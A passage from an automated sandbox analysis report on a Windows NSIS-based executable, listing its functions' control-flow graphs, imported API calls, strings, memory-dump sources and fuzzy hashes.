                                                                                                                                                                                    • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 72F0F685D453503CFE1145B50C45EB65FCE8B676A0BE0DA56E250CF183D9D58506C3F6

                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                    Function 004031F1 Relevance: 79.1, APIs: 33, Strings: 12, Instructions: 368stringcomfileCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 139 4031f1-403230 SetErrorMode GetVersion 140 403232-40323a call 4062fd 139->140 141 403243 139->141 140->141 146 40323c 140->146 143 403248-40325b call 40628f lstrlenA 141->143 148 40325d-403279 call 4062fd * 3 143->148 146->141 155 40328a-4032ea #17 OleInitialize SHGetFileInfoA call 405f65 GetCommandLineA call 405f65 GetModuleHandleA 148->155 156 40327b-403281 148->156 163 4032f6-40330b call 405928 CharNextA 155->163 164 4032ec-4032f1 155->164 156->155 160 403283 156->160 160->155 167 4033d0-4033d4 163->167 164->163 168 403310-403313 167->168 169 4033da 167->169 170 403315-403319 168->170 171 40331b-403323 168->171 172 4033ed-403407 GetTempPathA call 4031c0 169->172 170->170 170->171 173 403325-403326 171->173 174 40332b-40332e 171->174 182 403409-403427 GetWindowsDirectoryA lstrcatA call 4031c0 172->182 183 40345f-403479 DeleteFileA call 402d48 172->183 173->174 176 4033c0-4033cd call 405928 174->176 177 403334-403338 174->177 176->167 192 4033cf 176->192 180 403350-40337d 177->180 181 40333a-403340 177->181 188 403390-4033be 180->188 189 40337f-403385 180->189 186 403342-403344 181->186 187 403346 181->187 182->183 200 403429-403459 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4031c0 182->200 197 40350d-40351d call 4036db OleUninitialize 183->197 198 40347f-403485 183->198 186->180 186->187 187->180 188->176 191 4033dc-4033e8 call 405f65 188->191 194 403387-403389 189->194 195 40338b 189->195 191->172 192->167 194->188 194->195 195->188 211 403641-403647 197->211 212 403523-403533 call 405681 ExitProcess 197->212 201 403487-403492 call 405928 198->201 202 4034fd-403509 call 4037b5 198->202 200->183 200->197 213 403494-4034bd 201->213 214 4034c8-4034d2 201->214 202->197 216 4036c3-4036cb 211->216 217 403649-403662 GetCurrentProcess OpenProcessToken 211->217 220 4034bf-4034c1 213->220 223 4034d4-4034e1 call 4059eb 214->223 224 403539-40354d call 4055ec lstrcatA 214->224 221 4036d1-4036d5 ExitProcess 216->221 222 4036cd 216->222 218 403694-4036a2 call 4062fd 217->218 219 403664-40368e LookupPrivilegeValueA AdjustTokenPrivileges 217->219 235 4036b0-4036ba ExitWindowsEx 218->235 236 4036a4-4036ae 218->236 219->218 220->214 227 4034c3-4034c6 220->227 222->221 223->197 237 4034e3-4034f9 call 405f65 * 2 223->237 233 40355a-403574 lstrcatA lstrcmpiA 224->233 234 40354f-403555 lstrcatA 224->234 227->214 227->220 233->197 239 403576-403579 233->239 234->233 235->216 240 4036bc-4036be call 40140b 235->240 236->235 236->240 237->202 242 403582 call 4055cf 239->242 243 40357b-403580 call 405552 239->243 240->216 251 403587-403594 SetCurrentDirectoryA 242->251 243->251 252 4035a1-4035c9 call 405f65 251->252 253 403596-40359c call 405f65 251->253 257 4035cf-4035eb call 405f87 DeleteFileA 252->257 253->252 260 40362c-403633 257->260 261 4035ed-4035fd CopyFileA 257->261 260->257 263 403635-40363c call 405d44 260->263 261->260 262 4035ff-40361f call 405d44 call 405f87 call 405604 261->262 262->260 272 403621-403628 CloseHandle 262->272 263->197 272->260
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetErrorMode.KERNEL32 ref: 00403216
                                                                                                                                                                                    • GetVersion.KERNEL32 ref: 0040321C
                                                                                                                                                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040324F
                                                                                                                                                                                    • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040328B
                                                                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 00403292
                                                                                                                                                                                    • SHGetFileInfoA.SHELL32(00429830,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 004032AE
                                                                                                                                                                                    • GetCommandLineA.KERNEL32(0042EC00,NSIS Error,?,00000006,00000008,0000000A), ref: 004032C3
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(00000000,00435000,00000000,?,00000006,00000008,0000000A), ref: 004032D6
                                                                                                                                                                                    • CharNextA.USER32(00000000,00435000,00000020,?,00000006,00000008,0000000A), ref: 00403301
                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000400,00436400,00000000,00000020,?,00000006,00000008,0000000A), ref: 004033FE
                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(00436400,000003FB,?,00000006,00000008,0000000A), ref: 0040340F
                                                                                                                                                                                    • lstrcatA.KERNEL32(00436400,\Temp,?,00000006,00000008,0000000A), ref: 0040341B
                                                                                                                                                                                    • GetTempPathA.KERNEL32(000003FC,00436400,00436400,\Temp,?,00000006,00000008,0000000A), ref: 0040342F
                                                                                                                                                                                    • lstrcatA.KERNEL32(00436400,Low,?,00000006,00000008,0000000A), ref: 00403437
                                                                                                                                                                                    • SetEnvironmentVariableA.KERNEL32(TEMP,00436400,00436400,Low,?,00000006,00000008,0000000A), ref: 00403448
                                                                                                                                                                                    • SetEnvironmentVariableA.KERNEL32(TMP,00436400,?,00000006,00000008,0000000A), ref: 00403450
                                                                                                                                                                                    • DeleteFileA.KERNEL32(00436000,?,00000006,00000008,0000000A), ref: 00403464
                                                                                                                                                                                      • Part of subcall function 004062FD: GetModuleHandleA.KERNEL32(?,?,?,00403264,0000000A), ref: 0040630F
                                                                                                                                                                                      • Part of subcall function 004062FD: GetProcAddress.KERNEL32(00000000,?), ref: 0040632A
                                                                                                                                                                                      • Part of subcall function 00405F65: lstrcpynA.KERNEL32(?,?,00000400,004032C3,0042EC00,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F72
                                                                                                                                                                                      • Part of subcall function 004037B5: lstrlenA.KERNEL32(0042E3A0,?,?,?,0042E3A0,00000000,00435400,00436000,0042A870,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A870,00000000,?,761F3410), ref: 004038A5
                                                                                                                                                                                      • Part of subcall function 004037B5: lstrcmpiA.KERNEL32(?,.exe), ref: 004038B8
                                                                                                                                                                                      • Part of subcall function 004037B5: GetFileAttributesA.KERNEL32(0042E3A0), ref: 004038C3
                                                                                                                                                                                      • Part of subcall function 004037B5: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,00435400), ref: 0040390C
                                                                                                                                                                                      • Part of subcall function 004037B5: RegisterClassA.USER32(0042EBA0), ref: 00403949
                                                                                                                                                                                      • Part of subcall function 004036DB: CloseHandle.KERNEL32(FFFFFFFF,00403512,?,?,00000006,00000008,0000000A), ref: 004036E6
                                                                                                                                                                                    • OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 00403512
                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00403533
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 00403650
                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00403657
                                                                                                                                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040366F
                                                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 0040368E
                                                                                                                                                                                    • ExitWindowsEx.USER32(?,80040002), ref: 004036B2
                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 004036D5
                                                                                                                                                                                      • Part of subcall function 00405681: MessageBoxIndirectA.USER32(0040A218), ref: 004056DC
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Process$ExitFileHandle$EnvironmentModulePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpilstrcpyn
                                                                                                                                                                                    • String ID: "$.tmp$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`K v$~nsu
                                                                                                                                                                                    • API String ID: 3855923921-986466628
                                                                                                                                                                                    • Opcode ID: e4cd146345a9ea09f61e1cd1bab928ecbc887433274b998fcf644788d9cec410
                                                                                                                                                                                    • Instruction ID: 41c275c355797b12fd9b138c60a2ad170ddd3a1f93bd6a9867a2704463122372
                                                                                                                                                                                    • Opcode Fuzzy Hash: e4cd146345a9ea09f61e1cd1bab928ecbc887433274b998fcf644788d9cec410
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0DC1E470604741AAD7216F759E49B2F3EACAF45706F44053FF581B61E2CB7C8A098B2E
                                                                                                                                                                                    Function 00404A09 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 273 404a09-404a55 GetDlgItem * 2 274 404c75-404c7c 273->274 275 404a5b-404aef GlobalAlloc LoadBitmapA SetWindowLongA ImageList_Create ImageList_AddMasked SendMessageA * 2 273->275 276 404c90 274->276 277 404c7e-404c8e 274->277 278 404af1-404afc SendMessageA 275->278 279 404afe-404b05 DeleteObject 275->279 280 404c93-404c9c 276->280 277->280 278->279 281 404b07-404b0f 279->281 282 404ca7-404cad 280->282 283 404c9e-404ca1 280->283 284 404b11-404b14 281->284 285 404b38-404b3c 281->285 289 404cbc-404cc3 282->289 290 404caf-404cb6 282->290 283->282 286 404d8b-404d92 283->286 287 404b16 284->287 288 404b19-404b36 call 405f87 SendMessageA * 2 284->288 285->281 291 404b3e-404b6a call 404026 * 2 285->291 296 404e03-404e0b 286->296 297 404d94-404d9a 286->297 287->288 288->285 293 404cc5-404cc8 289->293 294 404d38-404d3b 289->294 290->286 290->289 324 404b70-404b76 291->324 325 404c34-404c47 GetWindowLongA SetWindowLongA 291->325 304 404cd3-404ce8 call 404957 293->304 305 404cca-404cd1 293->305 294->286 300 404d3d-404d47 294->300 302 404e15-404e1c 296->302 303 404e0d-404e13 SendMessageA 296->303 298 404da0-404daa 297->298 299 404feb-404ffd call 40408d 297->299 298->299 307 404db0-404dbf SendMessageA 298->307 309 404d57-404d61 300->309 310 404d49-404d55 SendMessageA 300->310 311 404e50-404e57 302->311 312 404e1e-404e25 302->312 303->302 304->294 334 404cea-404cfb 304->334 305->294 305->304 307->299 317 404dc5-404dd6 SendMessageA 307->317 309->286 319 404d63-404d6d 309->319 310->309 315 404fad-404fb4 311->315 316 404e5d-404e69 call 4011ef 311->316 320 404e27-404e28 ImageList_Destroy 312->320 321 404e2e-404e35 312->321 315->299 329 404fb6-404fbd 315->329 345 404e79-404e7c 316->345 346 404e6b-404e6e 316->346 327 404de0-404de2 317->327 328 404dd8-404dde 317->328 330 404d7e-404d88 319->330 331 404d6f-404d7c 319->331 320->321 332 404e37-404e38 GlobalFree 321->332 333 404e3e-404e4a 321->333 335 404b79-404b7f 324->335 339 404c4d-404c51 325->339 337 404de3-404dfc call 401299 SendMessageA 327->337 328->327 328->337 329->299 338 404fbf-404fe9 ShowWindow GetDlgItem ShowWindow 329->338 330->286 331->286 332->333 333->311 334->294 340 404cfd-404cff 334->340 343 404c15-404c28 335->343 344 404b85-404bad 335->344 337->296 338->299 348 404c53-404c66 ShowWindow call 40405b 339->348 349 404c6b-404c73 call 40405b 339->349 341 404d01-404d08 340->341 342 404d12 340->342 350 404d0a-404d0c 341->350 351 404d0e-404d10 341->351 354 404d15-404d31 call 40117d 342->354 343->335 358 404c2e-404c32 343->358 352 404be7-404be9 344->352 353 404baf-404be5 SendMessageA 344->353 359 404ebd-404ee1 call 4011ef 345->359 360 404e7e-404e97 call 4012e2 call 401299 345->360 355 404e70 346->355 356 404e71-404e74 call 4049d7 346->356 348->299 349->274 350->354 351->354 363 404beb-404bfa SendMessageA 352->363 364 404bfc-404c12 SendMessageA 352->364 353->343 354->294 355->356 356->345 358->325 358->339 375 404f83-404f97 InvalidateRect 359->375 376 404ee7 359->376 381 404ea7-404eb6 SendMessageA 360->381 382 404e99-404e9f 360->382 363->343 364->343 375->315 377 404f99-404fa8 call 40492a call 404912 375->377 378 404eea-404ef5 376->378 377->315 383 404ef7-404f06 378->383 384 404f6b-404f7d 378->384 381->359 388 404ea1 382->388 389 404ea2-404ea5 382->389 386 404f08-404f15 383->386 387 404f19-404f1c 383->387 384->375 384->378 386->387 391 404f23-404f2c 387->391 392 404f1e-404f21 387->392 388->389 389->381 389->382 393 404f31-404f69 SendMessageA * 2 391->393 394 404f2e 391->394 392->393 393->384 394->393
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404A21
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000408), ref: 00404A2C
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A76
                                                                                                                                                                                    • LoadBitmapA.USER32(0000006E), ref: 00404A89
                                                                                                                                                                                    • SetWindowLongA.USER32(?,000000FC,00405000), ref: 00404AA2
                                                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404AB6
                                                                                                                                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404AC8
                                                                                                                                                                                    • SendMessageA.USER32(?,00001109,?), ref: 00404ADE
                                                                                                                                                                                    • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404AEA
                                                                                                                                                                                    • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404AFC
                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00404AFF
                                                                                                                                                                                    • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404B2A
                                                                                                                                                                                    • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404B36
                                                                                                                                                                                    • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404BCB
                                                                                                                                                                                    • SendMessageA.USER32(?,0000110A,?,00000000), ref: 00404BF6
                                                                                                                                                                                    • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C0A
                                                                                                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 00404C39
                                                                                                                                                                                    • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404C47
                                                                                                                                                                                    • ShowWindow.USER32(?,00000005), ref: 00404C58
                                                                                                                                                                                    • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404D55
                                                                                                                                                                                    • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404DBA
                                                                                                                                                                                    • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404DCF
                                                                                                                                                                                    • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404DF3
                                                                                                                                                                                    • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E13
                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00404E28
                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 00404E38
                                                                                                                                                                                    • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404EB1
                                                                                                                                                                                    • SendMessageA.USER32(?,00001102,?,?), ref: 00404F5A
                                                                                                                                                                                    • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404F69
                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F89
                                                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00404FD7
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 00404FE2
                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00404FE9
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                    • String ID: $M$N
                                                                                                                                                                                    • API String ID: 1638840714-813528018
                                                                                                                                                                                    • Opcode ID: 3b740f44a2b1d633ad343a76b016798f79b98c3f4b333677a90c7392331c9530
                                                                                                                                                                                    • Instruction ID: 5e7fd9033250abe3372a8cc080de2667683fe8f184775387c018329cb0bba4e6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b740f44a2b1d633ad343a76b016798f79b98c3f4b333677a90c7392331c9530
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9502A1B0A00209AFEB20DF55DD85AAE7BB5FB84315F14413AFA10B62E1C7789D42CF58
                                                                                                                                                                                    Function 00402D48 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00402D59
                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,00436C00,00000400), ref: 00402D75
                                                                                                                                                                                      • Part of subcall function 00405AFE: GetFileAttributesA.KERNEL32(?,00402D88,00436C00,80000000,?), ref: 00405B02
                                                                                                                                                                                      • Part of subcall function 00405AFE: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B24
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,00435C00,00435C00,00436C00,00436C00,80000000,?), ref: 00402DC1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Inst, xrefs: 00402E2D
                                                                                                                                                                                    • Null, xrefs: 00402E3F
                                                                                                                                                                                    • soft, xrefs: 00402E36
                                                                                                                                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F20
                                                                                                                                                                                    • Error launching installer, xrefs: 00402D98
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                    • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                                                                                                    • API String ID: 4283519449-1074636621
                                                                                                                                                                                    • Opcode ID: bfd8ed3c0dfd54d9895a7dd254a8437a99cec9953569f61149433e9ea538f05b
                                                                                                                                                                                    • Instruction ID: b7ea9236aecaa86e611592eb70b2ed5589fa10121b1bd9207fea2451aa196312
                                                                                                                                                                                    • Opcode Fuzzy Hash: bfd8ed3c0dfd54d9895a7dd254a8437a99cec9953569f61149433e9ea538f05b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D51F431A00215ABDB20AF64DE89B9F7BB8FB14358F50413BE504B72D1C7B88D858B9C
                                                                                                                                                                                    Function 0040572D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 159filestringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DeleteFileA.KERNEL32(?,?,761F3410,00436400,00000000), ref: 00405756
                                                                                                                                                                                    • lstrcatA.KERNEL32(0042B878,\*.*,0042B878,?,?,761F3410,00436400,00000000), ref: 0040579E
                                                                                                                                                                                    • lstrcatA.KERNEL32(?,0040A014,?,0042B878,?,?,761F3410,00436400,00000000), ref: 004057BF
                                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,0040A014,?,0042B878,?,?,761F3410,00436400,00000000), ref: 004057C5
                                                                                                                                                                                    • FindFirstFileA.KERNEL32(0042B878,?,?,?,0040A014,?,0042B878,?,?,761F3410,00436400,00000000), ref: 004057D6
                                                                                                                                                                                    • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405883
                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00405894
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                    • String ID: \*.*
                                                                                                                                                                                    • API String ID: 2035342205-1173974218
                                                                                                                                                                                    • Opcode ID: 5a75186390c9518ef53bc7868eb0b51ef72d35058a64af47be824dbaeb8436d1
                                                                                                                                                                                    • Instruction ID: 2a0351abb2716448ee460da7bfccfa5d3c7c3698b554042fcfc8e424752a7a40
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5a75186390c9518ef53bc7868eb0b51ef72d35058a64af47be824dbaeb8436d1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2551B132900A04AAEF217B268C45FBF7A78DF42754F14817BF841B61D1D73C8952DEA9
                                                                                                                                                                                    Function 367B2639 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 367B2645
                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,00000017), ref: 367B2710
                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,00000017), ref: 367B2730
                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,00000017), ref: 367B273A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26280469171.00000000367B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26280499259.00000000367C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 254469556-0
                                                                                                                                                                                    • Opcode ID: ddc1fd082a0dc1be718e10a79c61e4cc284a3037370b7fda3b800b5215724e49
                                                                                                                                                                                    • Instruction ID: 0a9bfb46ec4a0883a590ed44526b1eaef3bbe44e95cf3910cbc3c4791f27073d
                                                                                                                                                                                    • Opcode Fuzzy Hash: ddc1fd082a0dc1be718e10a79c61e4cc284a3037370b7fda3b800b5215724e49
                                                                                                                                                                                    • Instruction Fuzzy Hash: 59314B75D0621C9BDF10DF60C989BCDBBB8AF08304F5041AAE50CAB250EB709A85CF49
                                                                                                                                                                                    Function 367B2264 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 367B2276
                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 367B2285
                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 367B228E
                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 367B229B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26280469171.00000000367B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26280499259.00000000367C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2933794660-0
                                                                                                                                                                                    • Opcode ID: 0e1e6dcce02965ac936fda1723803932b31940850197981ba16f3077bce8d874
                                                                                                                                                                                    • Instruction ID: 6750ebe7ba93355610d9cb24dabc8188750af17a1a6008ba8b68f4ad4ca40175
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e1e6dcce02965ac936fda1723803932b31940850197981ba16f3077bce8d874
                                                                                                                                                                                    • Instruction Fuzzy Hash: 82F05F75C20209EBCB04DBB4C649A9EBBF8FF18315F9144959512F7140E774AB069F51
                                                                                                                                                                                    Function 367B2B1C Relevance: 6.0, APIs: 4, Instructions: 12COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,367B2C3B,367BD1DC,00000017), ref: 367B2B21
                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(367BD1DC,?,367B2C3B,367BD1DC,00000017), ref: 367B2B2A
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409,?,367B2C3B,367BD1DC,00000017), ref: 367B2B35
                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,367B2C3B,367BD1DC,00000017), ref: 367B2B3C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26280469171.00000000367B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26280499259.00000000367C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3231755760-0
                                                                                                                                                                                    • Opcode ID: c6b5390c6209e037fdf314352ae5a69b89442324a9ca7014099334bd9b815753
                                                                                                                                                                                    • Instruction ID: f47d240fe4289bde86f2aae971c9e5abbf20398c3f0b412a2a6b393535fcb9c2
                                                                                                                                                                                    • Opcode Fuzzy Hash: c6b5390c6209e037fdf314352ae5a69b89442324a9ca7014099334bd9b815753
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6DD01232128208ABCB002FE0CD0DE993F2AEB0821AF800010FB0AE3040CB318403CB61
                                                                                                                                                                                    Function 367B60E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 367B61DA
                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 367B61E4
                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 367B61F1
                                                                                                                                                                                    Memory Dump Source
